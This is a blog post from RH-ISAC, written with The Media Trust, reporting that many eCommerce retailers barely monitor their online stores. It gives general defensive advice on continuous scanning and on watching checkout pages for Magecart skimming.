Blog contributed by Carlos Kizzee, Executive Vice President of Intelligence Operations & Legal Affairs, RH-ISAC.
eCommerce and online shopping are second nature to most of us now—both professionally and personally. Particularly during the pandemic, a greater percentage of our transactions are taking place online. And for those of us who work in the digital retail space, cybersecurity is a familiar concept: nobody ignores the need to protect our digital assets anymore. But are we really as well-protected as we think we are?
RH-ISAC and The Media Trust are exploring some of the unexpected sides of online retail in our series, 7 Crazy Things That Happen in Your Online Story Every Day. The first in this series, “Crazy Things You Wouldn’t See in Brick & Mortar,” focuses on online security controls and monitoring with retail stores. What is happening on your eCommerce site daily? Based on reviews of several hundred eCommerce retailers, we found that it was all too common to find:
- No monitoring at all – many retailers don’t monitor their online stores at all
- Manual monitoring – some retailers were only monitoring select pages at random frequencies
- Automated monitoring – even fewer retailers were performing automated monitoring, usually in a limited capacity
Imagine if the security team you hired to watch your home or store were only checking the premises for a couple of minutes a day, leaving it completely unattended for well over 99% of the time—complete lunacy, right? But this is the level of security our review found across the digital retail ecosystem.
Thankfully, fixing this insanity is not complicated: and not surprisingly, the solution amounts to “monitor your website more carefully.”
- Scan your entire environment (mobile apps and websites) continuously, and from a wide range of devices, browsers, and operating systems. If you’re a global enterprise, scan from different countries and locations.
- Scan your sensitive websites frequently (weekly, or at least monthly), and keep abreast of what is happening with them. By “sensitive,” we mean any site that contains your customers information (history, personal information, payment information, etc.). Make sure access to those pages is limited appropriately.
- Scan your cart and checkout system regularly: this is where Magecart and other skimming attacks take place. A good practice is to make purchases on your site while scanning the activity from outside the network, to see exactly what is happening and where the data is going.
As usual, security best practices are the digital retailer’s best friend. Take the time to understand your security program and your scanning protocol, and make sure your online store is as secure as you think it is!
RH-ISAC and The Media Trust will be looking into more surprising, unexpected, and flat-out crazy things that happen in digital stores that wouldn’t happen anywhere else. Stay tuned!